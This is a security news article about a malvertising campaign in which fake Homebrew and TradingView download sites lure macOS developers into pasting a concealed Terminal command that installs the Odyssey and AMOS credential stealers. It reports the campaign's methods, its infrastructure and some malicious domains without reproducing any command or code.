A new wave of macOS attacks is targeting developers via fake download websites that look like legitimate platforms such as Homebrew, LogMeIn, and TradingView.
Researchers at Hunt.io discovered a network of more than 85 domains earlier this month. The network uses social engineering to convince users to install malware themselves.
The campaign spreads the Odyssey Stealer and AMOS (Atomic macOS Stealer) malware families. Both families focus on stealing system information, browser data, and crypto wallet login details. The attacks are carefully designed to exploit developers’ trust.
The fake Homebrew and TradingView sites display seemingly legitimate download portals with buttons such as Copy command. When a user clicks the button, a hidden, base64-encoded Terminal command is copied to the clipboard. That command downloads a shell script that bypasses macOS security measures and executes the malware.
Via Google Search to fake download sites
BleepingComputer discovered that traffic to several of these domains, including homebrewonline.org, tradingviewen.com, and filmoraus.com, was directed via paid ads on Google Search. This allowed the attackers to reach unsuspecting users who were simply looking for the official download pages. In some cases, the command was presented as a so-called security verification process, for example via a fake Cloudflare check.
Technical analysis shows that immediately after installation, the malware attempts to obtain administrator privileges via sudo, collects system information, and terminates processes such as OneDrive updates to hinder detection or recovery. Sensitive data such as browser cookies, Keychain information, and crypto wallets are then exfiltrated to the command-and-control server.
The infrastructure behind the campaign consists of reused servers and SSL certificates dating back to 2023. It is noteworthy that the servers are not registered to organizations, but to individual names, indicating a long-term, semi-professional operation. The combination of infrastructure reuse, convincing fake sites, and now malvertising shows that the attackers are constantly expanding and refining their tactics.
The use of paid advertisements marks the next phase in the evolution of macOS malware campaigns. Whereas attackers previously relied on phishing links or social media, they now use search engine advertising channels to achieve legitimate-looking malware distribution. The campaign remains active, and both Hunt.io and BleepingComputer expect the infrastructure used to be further modified to evade detection.